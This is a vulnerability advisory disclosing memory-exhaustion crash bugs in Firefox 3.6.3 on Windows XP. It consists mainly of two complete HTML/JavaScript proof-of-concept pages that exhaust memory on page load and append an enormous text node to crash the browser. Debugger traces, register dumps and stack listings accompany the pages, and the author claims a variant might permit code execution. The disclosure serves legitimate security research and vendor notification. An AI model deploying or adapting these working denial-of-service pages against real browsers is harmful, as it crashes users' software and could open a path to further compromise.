Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities

                                                0x01. Description:
Memory exhaustion of Firefox 3.6.3 (latest) <= makes firefox can't make
texts into body element and then it crashed.
( raise exception using PoC #1, lower memory area read access violation
using PoC #2 )
Ofcourse an variation PoC made NULL Pointer deref so may also could be code
execution ( 0.1 % ). :-)

URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt

Vendor Status: unpatched. ( to now... doesn't exists any reliable exploit
so i disclosed to bugtraq firstly )

0x02. Proof of Concepts:

[PoC #1 - firefox_3.6.3_dos_poc_1.htm] --
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">

// Mozilla Firefox <= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #1
//
// o Summary:
// After loading this PoC, about 40 seconds later triggered.
// Crashes are occured at a same location.
//
// --
// 7c7e2af5 ff1510157d7c call dword ptr
[kernel32!_imp__RtlRaiseException (7c7d1510)]
// ds:0023:7c7d1510={ntdll!RtlRaiseException (7c93e528)} ( raised
)
//
// ##### 100% same below crash. exception raised. #####
// (f34.850): C++ EH exception - code e06d7363 (first chance)
// (f34.850): C++ EH exception - code e06d7363 (!!! second chance !!!)
// eax=0012aa58 ebx=01000121 ecx=00000000 edx=781d7ba8 esi=0012aae0
edi=2f900008
// eip=7c7e2afb esp=0012aa54 ebp=0012aaa8 iopl=0 nv up ei pl nz na
pe nc
// cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000206
// kernel32!RaiseException+0x53:
// 7c7e2afb 5e pop esi
// --
//
// Call Stack:
// 00 0012aa28 7815c54b e06d7363 00000001 00000003
kernel32!RaiseException+0x53
// WARNING: Stack unwind information not available. Following frames may be
wrong.
// 01 0012aa60 78164f33 0012aa70 781caa24 781ac11c
MOZCRT19!CxxThrowException+0x46
// 02 0012aa78 100cd464 08c00060 0012b1a0 21500008 MOZCRT19!operator
new+0x73
// 03 00000000 00000000 00000000 00000000 00000000
xul!gfxWindowsFontGroup::MakeTextRun+0x54

// Trace:
// MOZCRT19!operator new:
// 78164ec0 8b442404 mov eax,dword ptr [esp+4]
// 78164ec4 83ec0c sub esp,0Ch
// 78164ec7 50 push eax
// 78164ec8 e8134bfdff call MOZCRT19!malloc (781399e0)
// ...
// 78164f26 c74424081cc11a78 mov dword ptr [esp+8],offset
MOZCRT19!exception::`vftable'+0xc14 (781ac11c)
// 78164f2e e8d275ffff call MOZCRT19!CxxThrowException
(7815c505) ; Throw Exception.
// 78164f33 83c40c add esp,0Ch
// 78164f36 c3 ret
//
// MOZCRT19!CxxThrowException:
// 7815c505 55 push ebp
// 7815c506 8bec mov ebp,esp
// 7815c508 83ec20 sub esp,20h
// ...
// 7815c545 ff15e4911a78 call dword ptr [MOZCRT19!modf+0x87d4
(781a91e4)] ds:0023:781a91e4=
// {kernel32!RaiseException (7c7e2aa9)} ; Raise Exception!
//
// o Impact: DoS ( Exception Raise )
//
// o Tested on:
// - MS Win XP SP3 (ko)
// - Mozilla Firefox 3.6.3 (Win32) (ko)
// ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )
//
// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's
patched on Firefox 3.6
// so this is *not the same vulnerability*!
//
// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin
Rad Pop.
// - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571
//
// o Discovered by x90c in INetCop(c) Security during analysis.
// o Discovered date: 2010.03.04
// o Personal homepage: http://www.x90c.org
//
// Greets to Xpl017Elz(x82), rebel
//

function append_text_into_body()
{
var p1 = document.getElementById('p1');
var Text1 = "";
var TextNode = null;

// Trigger! MakeFont... into p element on body element.
for(var i = 0; i < 0x700000 / 4; i++)
{
Text1 = Text1 + "AAAA";
}

TextNode = document.createTextNode(Text1);
p1.appendChild(TextNode); // Memory Exhaustion makes FireFox can't make
Texts it caused an crash.
}

var arr1, arr2, arr3, arr4, arr5;
var a = 1;

var timer;

function fill_all_memory()
{
var chunk = unescape("%u4141%u4141");
var i = 0;

if( a > 5 )
{
a++;
}
if(a >= 30)
{
append_text_into_body();
}

while(chunk.length <= 0x400000)
{
chunk = chunk + chunk;
}
chunk = chunk + chunk + chunk;
chunk = chunk.substring(0, chunk.length);

if(a == 1)
{
arr1 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr1[i] = chunk;
}
a = 2;
}
else if(a == 2)
{
arr2 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr2[i] = chunk;
}
a = 3;
}
else if(a == 3)
{
arr3 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr3[i] = chunk;
}
a = 4;
}
else if(a == 4)
{
arr4 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr4[i] = chunk;
}
a = 5;
}
else if(a == 5)
{
arr5 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr5[i] = chunk;
}
a = 6;
}
}

function try_fill()
{
fill_all_memory();
setTimeout("try_fill();", 500);
}

</SCRIPT>
</HEAD>

<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
</HTML>

<!-- [ eoc ] -->


[PoC #2 - firefox_3.6.3_dos_poc_2.htm] --

<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">

// Mozilla Firefox <= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #2
//
// o Summary:
// After loading this PoC, about 40 seconds later triggered.
// Crashes are occured at a same location.
//
// --
// ##### almost 99% below crash #####
// (f0c.8b4): Access violation - code c0000005 (first chance)
// First chance exceptions are reported before any exception handling.
// This exception may be expected and handled.
// eax=0012aab8 ebx=00002226 ecx=000042a4 edx=000000ee esi=00003ce8
edi=000000ee
// eip=73f937cd esp=0012a3fc ebp=0012a3fc iopl=0 nv up ei pl zr na
pe nc
// cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246
// USP10!DoubleWideCharMappedString::operator[]+0x1f:
// 73f937cd 0fb70448 movzx eax,word ptr [eax+ecx*2]
ds:0023:00133000=???? ( beside stack area and unmapped )
// --
//
// 0:000> kp
// ChildEBP RetAddr
// 0012a3fc 73f99a42 USP10!DoubleWideCharMappedString::operator[]+0x1f
// 0012a4cc 73f92d34 USP10!ScriptTokenize+0x91
// 0012a4f4 100efc30 USP10!ScriptItemize+0x42
// WARNING: Stack unwind information not available. Following frames may be
wrong.
// 0012a5a0 7813807d xul!gfxWindowsFontGroup::GetUnderlineOffset+0x4cb0
// 00000000 00000000 MOZCRT19!expand+0x37d
//
// o Impact: DoS ( may also code execution )
//
// o Tested on:
// - MS Win XP SP3 (ko)
// - Mozilla Firefox 3.6.3 (Win32) (ko)
// ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )
//
// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's
patched on Firefox 3.6
// so this is *not the same vulnerability*! and this makes same crash with
[2]
//
// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin
Rad Pop.
// - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571
//
// [2] All browsers 0day Crash Exploit ( Inj3ct0r Team )
// - http://www.exploit-db.com/exploits/12491
//
// o Discovered by x90c in INetCop(c) Security during analysis.
// o Discovery date: 2010.03.04
// o Personal homepage: http://www.x90c.org
//
// Greets to Xpl017Elz(x82), rebel
//

function append_text_into_body()
{
var p1 = document.getElementById('p1');
var Text1 = "";
var TextNode = null;

// Trigger! MakeFont... into p element on body element.
for(var i = 0; i < 0x700000 / 4; i++)
{
Text1 = Text1 + "AAAA";
}

TextNode = document.createTextNode(Text1);
p1.appendChild(TextNode); // Memory Exhaustion makes FireFox can't make
Texts it caused an crash.
}

var a = 1;

var timer;

function fill_all_memory() // This function's variation can makes an null
pointer deref without append_text_into_body() calling.
{
var chunk = unescape("%u4141%u4242");
var i = 0;

append_text_into_body();

while(chunk.length <= 0x400000)
{
chunk = chunk + chunk;
}
chunk = chunk + chunk + chunk;
chunk = chunk.substring(0, chunk.length);
}

function try_fill()
{
fill_all_memory();
// this poc makes 99% almost crashed same location as below.
// 10: USP10!DoubleWideCharMappedString::operator[]+0x1f:
// 73f937cd 0fb70448 movzx eax,word ptr [eax+ecx*2]
ds:0023:00133000=????
// 100: ''
// 150: ''
// 200: ''
// 300: ''
// 500: ''
// 1000: ''
// 5000: ''
setTimeout("try_fill();", 10);
}

</SCRIPT>
</HEAD>

<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>

</HTML>

<!-- [ eoc ] -->